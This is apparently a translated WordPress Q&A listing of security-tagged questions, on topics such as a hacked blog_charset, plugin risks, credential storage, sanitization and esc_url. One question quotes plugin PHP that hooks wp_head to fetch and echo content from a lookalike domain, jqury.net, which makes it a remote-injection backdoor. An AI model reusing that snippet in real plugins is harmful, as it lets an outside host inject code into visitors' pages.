«security» etiketlenmiş sorular

İzinsiz girişleri önlemek için temaların, eklentilerin ve çekirdek kurulumun güçlendirilmesi.


2
Bir bilgisayar korsanı blog_charset değerini UTF-7 olarak değiştirirse, bu WordPress'i başka saldırılara karşı savunmasız hale getirir mi?
Son zamanlarda saldırıya uğrayan bir müşterim vardı ve sitesinde  ve Æ gibi garip karakterler olduğunu fark ettim. Bilgisayar korsanlarının wp_optionsveritabanındaki tabloda blog_charset değerini UTF-7 olarak değiştirdiği ortaya çıktı . UTF-8'e geri ayarladım, ancak UTF-7'ye ayarlandığı süre boyunca bunun herhangi bir güvenlik açığı yaratabileceğini merak ediyordum. Biraz arama yaptım ve …

6
Wordpress Eklentileri gerekli mi?
WordPress'te yeniyim. Son zamanlarda bilgisayar korsanlarının eklentilerdeki güvenlik açıklarından nasıl yararlanabileceği hakkında bir makale okudum. Google Pagespeed gibi çeşitli kaynaklar da eklentileri kullanmamı ya da en azından minimumda tutmamı sağladı. Şahsen, eklentilerden kaçınmaya çalışıyorum çünkü sitemde neler olduğunu daha fazla kontrol ediyorum ve birini indirmek neredeyse 'Harika, nasıl kullanılacağını öğrenmek …
19 plugins  security 

3
Wordpress Option DB'de API'ya Kullanıcı Adı ve Parola Nasıl Saklanır?
Şu anda bir eklenti geliştiriyorum ve muhtemelen diğer eklenti kullanabilirsiniz böylece eklenti deposunda muhtemelen daha fazla serbest bırakma şansı vardır. Eklenti bir API kullanıyor olacak ve bu API'yı kullanmak için bir kullanıcı adı ve şifre geçmeniz gerekiyor. Eklentimin bu giriş bilgilerini veritabanında saklaması gerekiyor. API bunları düz metinde gerektirse de …

2
Bunu bir eklentide buldum. Bu ne işe yarıyor? Bu tehlikeli mi?
Bunu bir eklentide buldum. Bu ne işe yarıyor? Bu tehlikeli mi? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

2
Eklentiler Veri Doğrulama / Dezenfeksiyondan Hangi Bağlamlardan Sorumludur?
Eklentilerim / temalarımdaki tüm verilerin veritabanına girmeden önce ve tarayıcıya çıkmadan önce güvenli bir şekilde işlendiğinden emin olmak istiyorum. Benim sorunum, API'nın sizin için - saniyeler sonrası meta alanlarını kaydederken - ve eklenti / tema yazarının bunu yapmaktan tamamen sorumlu olduğu diğerleri için - sanitizasyonu işlediği durumlar olduğu - özel …


3
Aramam gereken ortak güvenlik kusurları nelerdir? [kapalı]
Şu anda olduğu gibi, bu soru Soru-Cevap formatımıza uygun değil. Yanıtların gerçekler, referanslar veya uzmanlık tarafından desteklenmesini bekliyoruz, ancak bu soru muhtemelen tartışma, tartışma, oylama veya genişletilmiş tartışma talep edecektir. Bu sorunun çözülebileceğini ve muhtemelen yeniden açılabileceğini düşünüyorsanız, yardım için yardım merkezini ziyaret edin . 7 yıl önce kapalı . …



4
Admin-ajax.php nasıl çalışır?
Harici bir geliştiriciyle ilgili bazı sorunlar yaşıyoruz. wp-adminSiteye erişimi yalnızca dahili erişimle ( VPN üzerinden ) sınırlamak istiyoruz . Basitçe, dış kullanıcılar tarafından saldırıya uğramayacak. Yöneticileri siteden numaralandırabilir ve kimlik avı yapılmasını istemeyiz. Geliştiricimiz bunu yapamayacağımızı söylüyor çünkü sitenin harici olarak erişilebilir olması için sayfanın çalışması gerekir. özellikle admin-ajaxsayfa. Sayfa …
14 admin  ajax  security 

3
Erişimi önleyin veya readme.html, license.txt, wp-config-sample.php dosyasını otomatik olarak silin
Güvenlik konusunda biraz yardımcı olabilecek kısa bir soru. Ben readme.html dosyasında listelenen sürüm numarası olduğunu fark ettim. Her yükseltme işleminden sonra yeniden görünür ve licence.txt ve wp-config-sample.php dosyalarında da görünür. Yükseltmeden sonra WordPress'in bu dosyaları otomatik olarak kaldırmasının kolay bir yolu var mı? Sürüm numarasının meta etiketler, rss yayınları, atom …

1
WordPress'in güncellenmesi için neden özel ssh anahtarımın olması gerekiyor?
WordPress'i uygulama içinde güncellenecek şekilde yapılandırmak (yani WordPress) rahatlığı nedeniyle benim için idealdir. Yine de, gereksinimlerden rahatsız oluyorum. Php için ssh2 yüklendikten sonra gösterilen istenen alanlar sadece ortak anahtarımı değil, aynı zamanda özel anahtarımı da soruyor. En fazla sadece ortak anahtarın gerekli olacağını düşünürdüm. WordPress, sunucuma doğru yazılım paketini yükleyebilmesi …
13 security  updates  ssh 

1
Wp_insert_posts () ne kadar güvenli / dezenfekte edilmiştir?
Wp_insert_post () için Codex'a bakıldığında, bu fonksiyonun "... değişkenleri temizlediğini , bazı kontroller yaptığını, tarih / saat gibi eksik değişkenleri doldurduğunu" belirtti (EDIT: Codex girişini daha sağlam bir örnek içerecek şekilde güncelledim güvenlik yanı sıra meta ve kategori ataması da dahil) Sadece XSS hack'lerini ve benzerlerini önlemek için daha fazla …

4
Neden esc_url kullanmalıyım?
Bu şey kodumu zorlaştırıyor. Wordpress kodeksi, güvenlik hakkında belirsiz bir şekilde konuşarak esc_url kullanılmasına neden olur. Ama gerçekten zahmete değer mi? Örneğin, aşağıdakileri kullanarak önemli, pratik güvenlik avantajı nedir? <?php echo esc_url( home_url( '/' ) ); ?> onun yerine <?php echo home_url() ?> Not: Tema geliştirme hakkında değil, belirli bir …
12 security 

Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.